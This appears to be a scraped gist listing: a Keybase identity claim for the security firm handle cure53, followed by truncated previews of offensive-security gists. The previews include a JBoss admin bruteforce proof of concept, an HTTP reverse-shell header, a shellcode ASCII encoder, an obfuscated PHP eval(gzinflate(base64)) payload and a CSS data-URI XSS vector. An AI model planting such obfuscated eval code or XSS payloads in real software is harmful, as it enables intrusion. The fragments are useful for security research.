I hereby claim:
- I am cure53 on github.
- I am cure53 (https://keybase.io/cure53) on keybase.
- I have a public key whose fingerprint is F98B 0EC1 8640 2F60 292C 5877 C26C 8580 90F7 0ADA
To claim this, I am signing this object:
""" | |
Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999) | |
Author: @itsecurityco | |
Use: python bruteforce(PoC).py ip:port wordlist | |
""" | |
import re | |
import sys | |
import urllib | |
import requests |
""" | |
Bruteforce Password Generator | |
Author: @itsecurityco | |
Use: python BrutePWGen.py --merge-words --h4x0r keywords.txt | |
""" | |
import sys | |
from time import time | |
class wgen: |
function Get-LocalGroup { | |
# PS C:\Users\IEUser\Desktop> Get-LocalGroup -GroupName Administrators | |
# | |
# AccountName AccountSID | |
# ----------- ---------- | |
# Administrator S-1-5-21-1116692041-1164204812-2329106322-500 | |
# IEUser S-1-5-21-1116692041-1164204812-2329106322-1000 | |
# sshd_server S-1-5-21-1116692041-1164204812-2329106322-1002 | |
param( |
<# | |
Author: Casey Smith @subTee | |
License: BSD3-Clause | |
.SYNOPSIS | |
Simple Reverse Shell over HTTP. Execute Commands on Client. | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width"> | |
<title>JS Bin</title> | |
</head> | |
<body> | |
<?php | |
// I got this file once | |
eval(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?> |
}@import/**/data:text/css%3Bbase64%2CKnt4OmV4cHJlc3Npb24od2luZG93Lng%2FMDphbGVydCgxKSx3aW5kb3cueD0xKX0%3D; |
dir . | Foreach-Object{ | |
$file = $_ | |
$hash = Get-FileHash $file -Algorithm MD5 | |
$fileinfo = Get-Item $file | |
New-Object -TypeName PSObject -Property @{ | |
VersionInfo = $fileinfo.VersionInfo | |
LastWriteTime = $fileinfo.LastWriteTime | |
Length = $fileinfo.Length | |
Algorithm = $hash.Algorithm |
#!/usr/bin/python | |
# | |
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
# utility (as described in: Hacking - The Art of Exploitation). | |
# | |
# Basically one gives to the program's output a binary encoded shellcode, | |
# and it yields on the output it's ASCII encoded form. | |
# | |
# This payload will at the beginning align the stack by firstly moving |
I hereby claim:
To claim this, I am signing this object: